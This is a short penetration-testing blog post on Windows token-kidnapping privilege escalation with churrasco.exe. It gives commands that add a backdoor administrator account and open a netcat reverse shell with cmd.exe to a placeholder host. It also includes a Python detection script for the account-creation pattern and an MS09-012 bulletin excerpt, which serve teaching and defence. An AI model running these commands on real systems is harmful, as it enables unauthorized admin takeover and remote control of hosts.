Windows Privilege Escalation via Token Kidnapping

MrNmap
Jan 21, 2020

Uploading the binary to the box from the sqlninja apps directory

You can use churrasco.exe, the copy bundled with sqlninja, which is located at /usr/share/sqlninja/apps/churrasco.exe.

sqlninja uses it in cases where the sa password has been brute-forced.

After uploading it, you can elevate your privileges:

churrasco.exe "net user oscp oscp /add && net localgroup Administrators oscp /add"

(Reverse shell with elevated privileges; nc.exe must also be uploaded to the remote system.)

churrasco.exe "nc.exe ip port -e cmd.exe"
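From the defender's side, the first command above leaves a very recognisable footprint in the Windows Security log: an account is created (event 4720) and, seconds later, added to the built-in Administrators group (event 4732, group SID S-1-5-32-544). The following correlation check is an added example, not code from the original post; the event records it runs over are constructed for illustration and use a simplified field layout rather than real EVTX output.

```python
"""Correlate Security events 4720 (user account created) and 4732 (member
added to a security-enabled local group) to flag an account that is created
and then added to local Administrators within a short window, which is the
pattern produced by `net user X /add && net localgroup Administrators X /add`.
The sample events below are constructed for this example, not real log data."""
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of built-in Administrators

# Constructed sample events (simplified JSON-style records, not real logs).
SAMPLE_EVENTS = [
    {"time": "2020-01-21T10:00:01", "id": 4720, "target": "oscp",
     "subject": "NT AUTHORITY\\SYSTEM"},
    {"time": "2020-01-21T10:00:02", "id": 4732, "member": "oscp",
     "group_sid": "S-1-5-32-544", "subject": "NT AUTHORITY\\SYSTEM"},
    # Normal provisioning: account created, promoted almost a day later.
    {"time": "2020-01-21T11:30:00", "id": 4720, "target": "svc_backup",
     "subject": "CORP\\helpdesk"},
    {"time": "2020-01-22T09:00:00", "id": 4732, "member": "svc_backup",
     "group_sid": "S-1-5-32-544", "subject": "CORP\\helpdesk"},
    # Addition to Users (S-1-5-32-545), not Administrators: ignored.
    {"time": "2020-01-21T12:00:00", "id": 4732, "member": "alice",
     "group_sid": "S-1-5-32-545", "subject": "CORP\\helpdesk"},
]


def find_new_admin_accounts(events, window=timedelta(minutes=5)):
    """Return (account, created_at, promoted_at, subject) for every account
    that was created and then added to Administrators within `window`."""
    created = {}  # account name (lower-cased) -> creation timestamp
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO-8601 sorts lexically
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["target"].lower()] = ts
        elif ev["id"] == 4732 and ev["group_sid"] == ADMINISTRATORS_SID:
            name = ev["member"].lower()
            if name in created and ts - created[name] <= window:
                # The subject tells you which security context did the
                # promotion; SYSTEM or a service account doing this outside
                # of provisioning is worth an immediate look.
                hits.append((name, created[name], ts, ev["subject"]))
    return hits


if __name__ == "__main__":
    for account, made, promoted, who in find_new_admin_accounts(SAMPLE_EVENTS):
        print(f"ALERT: {account} created {made} and made admin {promoted} by {who}")
```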

Microsoft Security Bulletin MS09-012

This security update resolves four publicly disclosed vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker is allowed to log on to the system and then run a specially crafted application. The attacker must be able to run code on the local machine in order to exploit this vulnerability. An attacker who successfully exploited any of these vulnerabilities could take complete control over the affected system.

This security update is rated Important for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. For more information, see the subsection, Affected and Non-Affected Software, in this section.

The security update addresses the vulnerabilities by correcting the way that Microsoft Windows addresses tokens requested by the Microsoft Distributed Transaction Coordinator (MSDTC), and by properly isolating WMI providers and processes that run under the NetworkService or LocalService accounts. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.

Reference

https://www.notion.so/Windows-Privelege-Escalation-via-Token-Kidnapping-d40705518bf343438f9fcd8be0b2f0d3

MrNmap: Security Engineer | Penetration Tester | Red Team | Telecom Security | 5G security | Speaker